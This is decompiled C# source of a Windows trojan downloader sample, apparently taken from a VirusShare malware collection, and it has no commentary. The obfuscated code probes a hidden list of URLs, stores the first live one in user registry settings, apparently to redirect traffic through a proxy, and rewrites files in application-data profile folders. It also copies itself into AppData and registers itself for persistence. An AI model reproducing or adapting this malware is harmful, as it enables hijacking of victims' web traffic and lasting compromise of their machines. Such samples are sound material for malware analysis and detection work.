// Decompiled with JetBrains decompiler // Type: . // Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d // MVID: E3EED34E-DEA0-448A-9147-166831419ACC // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe using \u0003; using \u0004; using \u0005; using Microsoft.Win32; using System; using System.IO; using System.Net; using System.Reflection; using System.Runtime.InteropServices; using System.Text; namespace \u0004 { internal sealed class \u0001 { private static bool \u0001 = true; private static string[] \u0002 = new string[5] { \u0001.\u0001(860), \u0001.\u0001(941), \u0001.\u0001(1010), \u0001.\u0001(1087), \u0001.\u0001(1172) }; private static string \u0003 = \u0001.\u0001(1249); internal static bool \u0004 = false; private static bool \u0005 = false; private static void \u0001([In] string[] obj0) { \u0001.\u0001(); if (\u0001.\u0001) ; if (false) return; \u0001.\u0001(2); \u0001.\u0001(\u0001.\u0001(54)); string str1 = \u0001.\u0001(95); \u0001.\u0001(\u0001.\u0001(96)); for (int index = 0; index < \u0001.\u0002.Length; ++index) { \u0001.\u0001(\u0001.\u0001(141) + \u0001.\u0002[index]); HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(new Uri(\u0001.\u0002[index])); try { HttpWebResponse response = (HttpWebResponse) httpWebRequest.GetResponse(); if (response == null || response.StatusCode != HttpStatusCode.OK) { \u0001.\u0001(\u0001.\u0002[index] + \u0001.\u0001(154)); } else { \u0001.\u0001(\u0001.\u0002[index] + \u0001.\u0001(199)); str1 = \u0001.\u0002[index]; break; } } catch (Exception ex) { \u0001.\u0001(\u0001.\u0002[index] + \u0001.\u0001(212)); } } \u0001.\u0001(20); \u0001.\u0001(\u0001.\u0001(257)); RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(\u0001.\u0001(330), true); registryKey.SetValue(\u0001.\u0001(411), (object) 1, RegistryValueKind.DWord); registryKey.SetValue(\u0001.\u0001(428), (object) 1, RegistryValueKind.DWord); registryKey.SetValue(\u0001.\u0001(449), (object) str1, RegistryValueKind.String); registryKey.Close(); \u0001.\u0001(\u0001.\u0001(470)); string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0001.\u0001(503); \u0001.\u0001(\u0001.\u0001(540) + path); string searchPattern = \u0001.\u0001(561); \u0001.\u0001(10); foreach (string directory in Directory.GetDirectories(path, searchPattern)) { \u0001.\u0001(\u0001.\u0001(574) + directory); if (System.IO.File.Exists(directory + \u0001.\u0001(607))) { \u0001.\u0001(\u0001.\u0001(620)); \u0001.\u0001(\u0001.\u0001(641)); StringBuilder stringBuilder = new StringBuilder(); foreach (string readAllLine in System.IO.File.ReadAllLines(directory + \u0001.\u0001(607))) { for (int index = 0; index < 5; ++index) { if (readAllLine.Contains(\u0001.\u0001(654) + index.ToString() + \u0001.\u0001(699))) readAllLine.Replace(\u0001.\u0001(654) + index.ToString() + \u0001.\u0001(699), \u0001.\u0001(704)); } stringBuilder.AppendLine(readAllLine); } stringBuilder.AppendLine(\u0001.\u0001(704)); System.IO.File.WriteAllText(directory + \u0001.\u0001(607), stringBuilder.ToString()); } } if (\u0001.\u0005) { string str2 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0001.\u0001(753); if (!System.IO.File.Exists(str2)) { Registry.CurrentUser.OpenSubKey(\u0001.\u0001(778), true).SetValue(\u0001.\u0001(839), (object) str2); System.IO.File.Copy(Assembly.GetExecutingAssembly().Location, str2); \u0001.\u0001(\u0001.\u0003); } } else \u0001.\u0001(\u0001.\u0003); } } }